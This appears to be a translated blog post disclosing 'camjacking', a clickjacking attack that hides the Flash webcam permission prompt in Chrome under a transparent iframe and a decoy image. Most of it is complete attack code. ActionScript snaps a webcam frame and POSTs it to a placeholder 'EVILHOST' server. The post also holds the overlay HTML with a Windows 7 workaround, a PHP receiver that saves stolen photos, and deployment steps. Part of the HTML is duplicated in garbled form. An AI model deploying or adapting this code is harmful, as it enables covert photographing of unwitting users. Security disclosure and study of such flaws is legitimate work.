Camjacking, like the evolution of Clickjacking, or “Gyulchatay! Open your face! ”

In this post, I tried to explain the essence of the new attack (the attack itself is not new, but let me call it that). The bug is peculiar for Windows 7,8, Mac OS X. We also need Google Chrome, well, Flash. The topic will concern the idea of ​​total surveillance, especially popular in recent days.
Interesting? I ask under the cat.

It was an ordinary night, and as it should be, I was picking at the code. Already I do not remember which one, but the night played its role. Have you ever wondered: is it possible to hide the security message of the Flash Player when the flash file tries to access the webcam or microphone? As usual, such thoughts come spontaneously, but why not try to accomplish something that wandered so strangely into your head? So I thought the same way.

Having written a simple page with opacity and flash container (flash requested access to the webcam), it was noted that Firefox 21, Opera 12.15 either ignored the transparency of the flash animation, or simply incorrectly processed. But IE 10 and Chrome 27.0.1453.110 perfectly processed transparency and allowed to place text and / or image on top of themselves. That, undoubtedly, would go hand to web designers. But staying on top of things was simply not interesting, and I began to dig deeper, taking the idea of ​​a Clickjacking attack, but remaking it to fit my needs, that is, borrowing all the “useful” functions for the attacker.
')
I chose to access the webcam (of course, we can still access the microphone, but was it important then?)
So, I wrote a simple USB flash drive that takes a picture using a webcam and sends it to the server.
I am not an expert in ActionScript, so if you have any complaints, I'm ready to make corrections in the code.

package{ import flash.display.BitmapData; import flash.display.Sprite; import flash.media.Camera; import flash.media.Video; import flash.net.*; import flash.utils.ByteArray; import flash.events.*; public class Main extends Sprite { private var cam:Camera; private var video:Video; private var bitmapdata:BitmapData; private var ba:ByteArray; private var url:URLRequest = new URLRequest("http://EVILHOST/upload.php"); //  upload.php (   ) private var wclose:URLRequest = new URLRequest("javascript:alert('Camjacked? Ok. |fil9{06.2013}|');"); private var loader : URLLoader = new URLLoader(); public function Main():void { run(); } private function run():void { cam = Camera.getCamera(); if(cam != null){ //   cam.addEventListener(ActivityEvent.ACTIVITY, activityHandler); video = new Video(640, 480); cam.setMode(640, 480, 60); //60 fps video.attachCamera(cam); } } private function activityHandler(event:ActivityEvent):void { // ""  bitmapdata = new BitmapData(video.width, video.height); bitmapdata.draw(video); ba = PNGEncoder.encode(bitmapdata); //Adobe PNGEncoder url.method = URLRequestMethod.POST; url.data = ba; loader.addEventListener(Event.COMPLETE, on_complete); loader.load(url); //  function on_complete(e : Event):void { navigateToURL(wclose, '_self'); // Alert } cam.removeEventListener(ActivityEvent.ACTIVITY, activityHandler); } } } 

Take PNGEncoder .
FlashDevelop project here

Unfortunately, after conducting additional tests, it was revealed that IE does not allow interacting with a translucent element, ie it is impossible to click in the dialog box.
Since I have Windows 8, the tests under it went off with a bang, however, on Windows 7 the dialog box disappeared (at opacity: 0) only after the flash drive was “selected” with the mouse. But even for this misfortune its own “Dirty hack” was found (more on which later). Which implied the refusal of the text on top of the flash drive, and overlaying the picture on top of the flash drive.

We have:

1) swf.html:

 <html> <body> <object width="270" height="270"> <param name="movie" value="camjack.swf"> <embed src="camjack.swf" width="270" height="270"> </embed> </object> </body> </html> 

2) index.html:

 <html> <head> <script> var exit=function(){document.location='about:blank'}; //  ,    var tryimages=function(){ //easy hack.   ? return (document.getElementById('imgenabled').height==1&&document.getElementById('imgenabled').width==1)}; var load=function(){ //   ;  Chrome, Windows 7, Windows 8 if((!tryimages()) || (navigator.userAgent.indexOf('Chrome') == -1)/* || ((navigator.userAgent.indexOf('Windows NT 6.1') == -1) & (navigator.userAgent.indexOf('Windows NT 6.2') == -1))*/) //    { exit() }; //Windows 7 Chrome hack if(navigator.userAgent.indexOf('Windows NT 6.1') != -1){ //DIRTY HACK (Windows 7) -  "". . . setInterval("document.getElementById('ifr').height=1;document.getElementById('ifr').height=291",300); setInterval("document.getElementById('ifr').width=1;document.getElementById('ifr').width=291",350); setTimeout("document.getElementById('img').width=291",1000); setTimeout("document.getElementById('img').height=291",1070); // 70 }}; </script> <title>Camjacking simple example</title> <style> iframe { position: absolute; opacity: 0.0; z-index: 1; }; </style> </head> <body onload='load()'> <!-- PNG 1x1 --> <img id='imgenabled' style='display:none' src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAAEnQAABJ0Ad5mH3gAAAAMSURBVBhXY/j//z8ABf4C/qc1gYQAAAAASUVORK5CYII='></img> <iframe id='ifr' src='./swf.html' width='290' height='290'></iframe> <img id='img' src='./img.jpg' width='290' height='290'></img> </body> </html> = 'display: none' src = 'data: image / png; base64, iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAAEnQAABJ0Ad5mH3gAAAAMSURBVBhXY / j // z8ABf4C / qc1gYQAAAAASUVORK5CYII ='> </ img> <html> <head> <script> var exit=function(){document.location='about:blank'}; //  ,    var tryimages=function(){ //easy hack.   ? return (document.getElementById('imgenabled').height==1&&document.getElementById('imgenabled').width==1)}; var load=function(){ //   ;  Chrome, Windows 7, Windows 8 if((!tryimages()) || (navigator.userAgent.indexOf('Chrome') == -1)/* || ((navigator.userAgent.indexOf('Windows NT 6.1') == -1) & (navigator.userAgent.indexOf('Windows NT 6.2') == -1))*/) //    { exit() }; //Windows 7 Chrome hack if(navigator.userAgent.indexOf('Windows NT 6.1') != -1){ //DIRTY HACK (Windows 7) -  "". . . setInterval("document.getElementById('ifr').height=1;document.getElementById('ifr').height=291",300); setInterval("document.getElementById('ifr').width=1;document.getElementById('ifr').width=291",350); setTimeout("document.getElementById('img').width=291",1000); setTimeout("document.getElementById('img').height=291",1070); // 70 }}; </script> <title>Camjacking simple example</title> <style> iframe { position: absolute; opacity: 0.0; z-index: 1; }; </style> </head> <body onload='load()'> <!-- PNG 1x1 --> <img id='imgenabled' style='display:none' src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAAEnQAABJ0Ad5mH3gAAAAMSURBVBhXY/j//z8ABf4C/qc1gYQAAAAASUVORK5CYII='></img> <iframe id='ifr' src='./swf.html' width='290' height='290'></iframe> <img id='img' src='./img.jpg' width='290' height='290'></img> </body> </html> 

3) img.jpg here

4) upload.php:

 <?php $imgdata = file_get_contents('php://input'); //input raw POST data $length = 10; $randomString = substr(str_shuffle("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length); $imgname = "./images/".$randomString.".png"; if($imgdata){ file_put_contents($imgname, $imgdata); //PHP5 }; ?> 

5) camjack.swf assemble yourself.

6) $ mkdir ./images

Put all this, with love, into the root of the site. Oh, and do not forget to put crossdomain.xml in the root of the site with upload.php

After all the dances, in Windows 8 everything looked very personal (opacity: 0.5):



I launched a small example site (thanks to korowkin ). If something does not start, well, or starts, please unsubscribe. I checked everything on a couple of computers. Not very painful and confident in the performance described above.

Example online: http: // * / *

View images online: http: // * / *

Thank you all, the tests are completed.

Well, two videos with the work of the code.

Windows 7:

http://www.youtube.com/watch?v=hQj6bqTAXKQ

Windows 8:

http://www.youtube.com/watch?v=vuTd481N6Os

PS (As an author. You can not read): It so happened that after school I go to the cultural capital of our immense homeland. In honor of what I am writing the following: if you need a high-quality audit of your project, I can offer you my services. Contacts in profile.

UPD: Google has released an update.

Have a nice day!